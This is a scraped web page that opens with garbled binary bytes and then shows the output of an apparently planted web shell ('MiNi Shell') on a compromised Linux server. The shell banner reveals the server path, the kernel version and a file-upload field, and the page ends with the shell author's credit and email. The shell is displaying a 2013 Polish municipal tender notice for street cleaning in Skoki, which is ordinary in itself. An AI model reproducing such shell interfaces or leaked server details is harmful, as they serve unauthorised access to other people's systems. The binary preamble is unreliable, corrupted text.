JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/241085-N-2013.html

<p class="kh_header"><b>Skoki: Usługi komunalne związane z utrzymaniem czystości i porządku w m. Skoki w okresie od 01 stycznia 2014r. do 31 grudnia 2014r.</b><br>
<b>Numer ogłoszenia: 241085 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Skoki , ul. Ciastowicza 11, 62-085 Skoki, woj. wielkopolskie, tel. 061 8925801, faks 061 8925803.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi komunalne związane z utrzymaniem czystości i porządku w m. Skoki w okresie od 01 stycznia 2014r. do 31 grudnia 2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usług objętych przetargiem
I. Zamówienie dotyczy następujących ulic i placów w Skok

Nazwa ulicy, placu
1. Kościelna
2. Jana Pawła II z parkingami
3. Wągrowiecka (do skrzyżowania z ul. Mickiewicza i Dworcową, łącznie z parkingiem przy Gminnym Ośrodku Zdrowia)
4. Rynkowa
5. Ciastowicza
6. Kazimierza Wielkiego z parkingiem
7. Plac Powstańców Wlkp.
8. Plac Strażacki
9. Dworcowa
10. Dąbrowskiego
11. Parkowa do skrzyżowania z ul. Rościńską (obwodnica)
12. Rakojedzka (od ul. Antoniewskiej do ul. Granicznej)
13. Okrężna
14. Poprzeczna
15. Podgórna
16. Osiedlowa
17. Graniczna
18. Poznańska (od ul. Kościelnej do nieruchomości nr 23)
19. Rościńska do skrzyżowania z ul. Parkową
20. Rogozińska (od skrzyżowania do parkingu przed wejściem głównym do hali sportowej i gimnazjum łącznie z parkingami i nawrotem do autobusów szkolnych
21. Zamkowa 
22. Antoniewska do skrzyżowania z ul. Topolową
23. Sienkiewicza
24. Mickiewicza 
25. Pogodna
26. Kręta
27. Rościńska przylegająca do cmentarza
28. dojście piesze od ul. Parkowej do stadionu KS Wełna i kościoła 
29. Słowackiego
30. Polna
31. Akacjowa
32. B. Głowackiego
33. Kościuszki z łącznikiem do ul. Rakojedzkiej
34. Kasztanowa
35. Lipowa
36. Plac targowo-parkingowy -ul. Kościelna
   
II. Zakres prac związanych z utrzymaniem porządku i czystości na w.wym. ulicach i  placach obejmuje:
1. Pozimowe sprzątanie ulic, placów i parkingów w tym placu targowo-parkingowego przy ul. Kościelnej ( jednorazowo) w terminie do dnia  31.03.2014r. na powierzchni ok. 73.167 m2.
W ramach pozimowego sprzątania ulic, placów i parkingów z piasku i innych zanieczyszczeń po okresie zimowym wykonawca zobowiązany jest dodatkowo do oczyszczenia z liści, papierów, butelek plastikowych itp. przylegających do ulic żywopłotów przy ul. Poznańskiej, Wągrowieckiej i Ciastowicza. Długość żywopłotów ok. 250 m.
Zamawiający wymaga użycia do zamiecenia ulic, placów i parkingów po okresie zimowym zamiatarki.  
2. Pozimowe sprzątanie chodników w tym na placu targowo-parkingowym przy ulicy Kościelnej  (jednorazowo) w terminie do dnia 31.03.2014r. 
W ramach pozimowego sprzątania chodników wykonawca zobowiązany jest do oczyszczenia chodników z piasku i innych zanieczyszczeń po okresie zimowym.
Pozimowym sprzątaniem chodników objęte są następujące ulice:
Kościelna, Plac Powstańców Wlkp. Jana Pawła II, Ciastowicza, Kazimierza Wielkiego,
Dworcowa, Rakojedzka, Antoniewska, Rościńska, Poznańska , Parkowa i Wągrowiecka oraz chodniki na placu targowo-parkingowym przy ulicy Kościelnej na powierzchni ok.                  13.850 m2.
3. Sprzątanie ulic, placów, przejść pieszych i parkingów oraz placu targowo-parkingowego w Skokach objętych zamówieniem w okresie od 01.04.2013r. do 30.11.2014r. na powierzchni ok. 73.167 m2.
Sprzątanie ulic, placów, przejść pieszych i parkingów oraz placu targowo-parkingowego przy ul. Kościelnej obejmuje ich zamiatanie oraz oczyszczanie z papierów i innych odpadów oraz zanieczyszczeń a szczególnie w okresie jesiennym z opadających liści.
Zamawiający wymaga, aby wykonawca w ramach tego zadania:
a) wykonał generalne sprzątanie przejścia pieszego od ul. Parkowej do stadionu KS Wełna przed Dniami Skoków oraz odcinka ul. Rościńskiej wzdłuż cmentarza przed Dniem Święta Zmarłych - 01.11.2014r.
b) sprzątanie i zamiatanie ulic, placów i parkingów wykonywał nie tylko przy użyciu  sprzętu mechanicznego (zamiatarki) lecz w razie konieczności również ręcznie na żądanie Zamawiającego,
c) w miesiącu październiku i listopadzie  oczyszczał ulice, place i parkingi z opadłych liści,
d) oczyszczał systematycznie przylegające do ulic żywopłoty z papierów, butelek, liści i innych zanieczyszczeń.
Zamiatanie ulic, placów, parkingów, placu targowo-parkingowego i przejść pieszych winno odbywać się sprzętem mechanicznym oraz ręcznie z następującą  częstotliwością, a mianowicie:
3.1  trzy razy w miesiącu   - w pierwszych 7 dniach miesiąca, na początku trzeciego tygodnia miesiąca i w czwartym tygodniu miesiąca,

Nazwa ulicy; Powierzchnia jezdni do zamiatania i sprzątania w m2; Długość ulicy,
Placu w m
1.Kościelna; 2380 m2; 305 m
2.Jana Pawła II + parkingi; 3700 m2; 330 m
3. Rynkowa; 90 m2; 30 m
4.Wągrowiecka + parkingi; 1900 m2; 460 m
5. Ciastowicza; 1480 m2; 215 m
6. Kazimierza Wielkiego + parking; 1700 m2; 270 m
7. Plac Powstańców Wlkp.; 3500 m2; 130 m
8. Plac Strażacki; 600 m2; 20 m
9. Plac Targowo-parkingowy przy ul. Kościelnej; 8800 m2
--------------------------------------------------------------------

Razem: (I zakres) 24150 m2; 1760 m

3.2  dwa  razy w miesiącu:  w pierwszych 7 dniach miesiąca oraz w trzecim tygodniu miesiąca 
Nazwa ulicy, placu;  Powierzchnia jezdni do zamiatania i sprzątania w m2; Długość ulicy
w m
1. Dworcowa; 1900 m2; 270 m
2. Dąbrowskiego; 750 m2; 130 m
3. Parkowa; 3000 m2; 550 m
4. Rakojedzka; 3300 m2; 600 m
5. Poznańska; 2300 m2; 390 m
6. Rogozińska; 1800 m2; 250 m
7. Kościńska; 2700 m2; 450 m
8. Antoniewska; 2500 m2; 500 m
9. Wągrowiecka od skrzyżowania z ul. Ciastowicza; 1750 m2; 350 m
-----------------------
 Razem; (II zakres) 20000 m2; 3490 



33. jeden raz w miesiącu, w czwartym tygodniu miesiąca
Nazwa ulicy, placu; Powierzchnia jezdni do zamiatania i sprzątania w m2; Długość ulicy
w m
1. Zamkowa; 2200 m2; 390 m
2. Sienkiewicza; 1800 m2; 300 m 
3. Mickiewicza; 1760 m2 ; 320 m
4. Pogodna; 1900 m2; 340 m
5. Kręta; 570 m2; 190 m
6. Okrężna; 2800 m2; 550 m
7. Poprzeczna; 1450 m2; 250 m
8. Osiedlowa; 1700 m2; 340 m
9. Graniczna; 1450 m2; 280 m
10. Podgórna; 1800 m2; 360 m
11. Rościńska przy cmentarzu; 1600 m2; 280 m
12. Przejście piesze do kościoła i stadionu; 270 m2; 90 m
13. Słowackiego; 605 m2; 110 m
14. Polna; 750 m2; 150 m
15. Akacjowa; 1800 m2; 360 m
16. B. Głowackiego; 770 m2; 151 m
17. Kościuszki do Rakojedzkiej; 3560 m2; 784 m,
18. Kasztanowa ;1700 m2; 340 m,
19. Lipowa; 532 m2; 133 m,    
-------------------------------
Razem: (III zakres) 29017 m2; 5718 m


4. Oczyszczanie w miesiącu październiku i listopadzie chodników i ulic z opadłych liści po stronie drzew - ulice: Ciastowicza, Zamkowa, Dworcowa, Kazimierza Wielkiego,                      Jana Pawła II, Plac Powstańców Wlkp. Rościńska (wzdłuż cmentarza) na powierzchni                 ok. 8400 m2 

5. Opróżnianie koszy ulicznych z ulic i placów objętych zamówieniem i zbieranie śmieci typu kartony, papiery, butelki, opakowania itp.z chodników do nich przyległych i żywopłotów oraz placu targowo-parkingowego w terminie od 01 stycznia 2014r. do 31 grudnia 2014r. przy zachowaniu następującej częstotliwości: wszystkie ulice i place objęte zamówieniem codziennie z wyjątkiem niedziel i dni świątecznych  w łącznej ilości ok. 121 szt.

Miejsce ustawienia koszy (nazwa ulicy,placu); Ilość koszy w szt.
1. Ciastowicza 6 szt.
 2. Zamkowa 2 szt.
 3. Sienkiewicza 1 szt.
 4. Wągrowiecka 7 szt.
 5. Jana Pawła II 11 szt.
 6. Plac Powstańców Wlkp. 10 szt.
  7. Plac Strażacki 1 szt.
  8. Kościelna 12 szt.
  9. Poznańska 4 szt.
 10. Kościńska 6 szt.
  11. Kazimierza Wielkiego 6 szt.
  12. Dworcowa 3 szt.
  13. Rakojedzka 5 szt.
  14. Okrężna 6 szt.
  15. Poprzeczna 3 szt.
  16.Antoniewska 4 szt.
  17. Rogozińska 5 szt.
  18. Parkowa 3 szt.
  19. Kręta (plac zabaw) 2 szt.
  20. Polna (plac zabaw) 3 szt.
  21. Dąbrowskiego 1 szt.
  22. Podgórna (plac zabaw) 3 szt.
  23. Osiedlowa 1 szt.
  24. Graniczna  1 szt.
  25. Plac targowo-parkingowy - ul. Kościelna  15 szt.
---------------------------
  Razem: 121 szt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Sprzątanie i zamiatanie ulic na terenie miasta Skoki na powierzchni 73167 m2 w okresach nieobjętych zamówieniem w przypadku sprzyjających warunków atmosferycznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności zamawiający uzna posiadania aktualnej decyzji starosty w zakresie zbierania i transportu odpadów związanych ze świadczoną usługą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania potencjałem technicznym do wykonania zamówienia zamawiający uzna dysponowanie sprzętem w ilości: 
- zamiatarka samochodowa lub ciągnikowa   1 szt.
- samochód dostawczy                                     1 szt.
- samochód ciężarowy min 5t                           1 szt.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej zamawiający uzna posiadanie opłaconej polisy  a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 100.000,00 zł (sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://skoki.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Skokach, ul. Ciastowicza 12, 62-085 Skoki,
Sekretariat pok. nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Skokach, ul. Ciastowicza 12, 62-085 Skoki,
Sekretariat pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com